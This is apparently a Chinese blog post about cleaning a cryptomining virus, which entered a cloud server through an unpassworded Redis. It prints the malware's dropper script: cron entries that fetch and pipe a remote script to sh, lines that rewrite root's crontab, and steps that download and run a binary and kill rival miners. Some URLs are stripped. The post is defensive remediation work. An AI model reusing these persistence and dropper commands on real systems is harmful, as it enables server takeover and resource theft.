快看下你的雲上伺服器是否也遇到的這個問題

2021-10-04 09:39:49 字數 2293 閱讀 1926

3 月,跳不動了?>>>

linux 下qw3xt.2,解決挖礦病毒

早上開啟電腦,連線伺服器,使用top檢視cpu狀態。結果顯示程序占用cpu99%以上。 

解決辦法:

1、首先解決redis入口問題,因為最開始沒有設定密碼,所以首先修改redis.conf。設定密碼,然後重啟redis

2、進入/tmp資料夾下。發現qw3xt.2檔案,刪除。之後kill掉qw3xt.2該程序,但是一段時間之後,發現該行程又重新啟動。

肯定是有守護程序,觀察top命令下的程序,發現乙個可疑的進行

3、在/tmp資料夾下發現該程序的檔案 ls /tmp

發現qw3xt.2檔案又重新生成了。這時,首先刪除qw3xt.2檔案和ddgs.3013檔案,然後使用top查詢qw3xt.2和ddgs.3013的pid,直接kill掉。

4、一段時間之後,刪除的檔案重新生成,dds和挖礦的程序又重新執行。此時懷疑是否有計畫任務,此時檢視計畫任務的列表

[root@izbp1cbg04oh74k1dexpujz tmp]# crontab -l


*/15 * * * * curl -fssl | sh


[root@izbp1cbg04oh74k1dexpujz tmp]# crontab -r //刪除計畫任務
此時計畫任務已經刪除。詳細資訊檢視

計畫任務刪除完成之後,這個13又開始執行。太頑固了。

於是我又看計畫任務的內容,是否是有東西沒有刪除乾淨。

[root@fantj tmp]# curl -fssl 


export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin


echo "" > /var/spool/cron/root


echo "*/15 * * * * curl -fssl | sh" >> /var/spool/cron/root


mkdir -p /var/spool/cron/crontabs


echo "" > /var/spool/cron/crontabs/root


echo "*/15 * * * * curl -fssl | sh" >> /var/spool/cron/crontabs/root


ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013


if [ ! -f "/tmp/ddgs.3013" ]; then


curl -fssl -m) -o /tmp/ddgs.3013


fichmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013


ps auxf | grep -v grep | grep circle_mi | awk '' | xargs kill


ps auxf | grep -v grep | grep get.bi-chi.com | awk '' | xargs kill


ps auxf | grep -v grep | grep hashvault.pro | awk '' | xargs kill


ps auxf | grep -v grep | grep nanopool.org | awk '' | xargs kill


ps auxf | grep -v grep | grep minexmr.com | awk '' | xargs kill


ps auxf | grep -v grep | grep /boot/efi/ | awk '' | xargs kill


#ps auxf | grep -v grep | grep ddg.2006 | awk '' | kill


#ps auxf | grep -v grep | grep ddg.2010 | awk '' | kill


發現計畫任務在伺服器中建立了幾個檔案,


/var/spool/cron/crontabs/root


/var/spool/cron/root


內容是*/15 * * * * curl -fssl | sh。(與計畫任務相同)


將計畫任務中建立的檔案刪除。
最終,這個挖礦病毒終於刪除完

測試伺服器上遇到的問題

師哥把兩個專案的前台和後台都放在了乙個測試伺服器上面,讓我們方便進行檢視測試 今天我在對我專案的具體模組進行檢視的時候,結果出現了internet server error 好像叫這個 錯誤,這下我不會了,還以為是使用者註冊登入許可權的問題。然後師哥給我說這種錯誤可以用測試伺服器的工作日誌來檢視問題...

Django 發上雲伺服器遇到的問題

解決方法 原文 在python安裝目錄 lib site package django view裡找到debug.py,然後在找對應位置加上 utf 8 解決辦法 去django admin.py startproject project name建立的專案中去修改 setting.py 檔案 al...

更換雲伺服器上的Python版本

阿里雲提供的python版本單一,如需要其他版本的python,可按照如下步驟來更換。0 預備 更新系統,安裝需要的工具。sudo apt get upgrade apt get update sudo apt get install gcc make1 解除安裝自帶的python 輸入如下命令 s...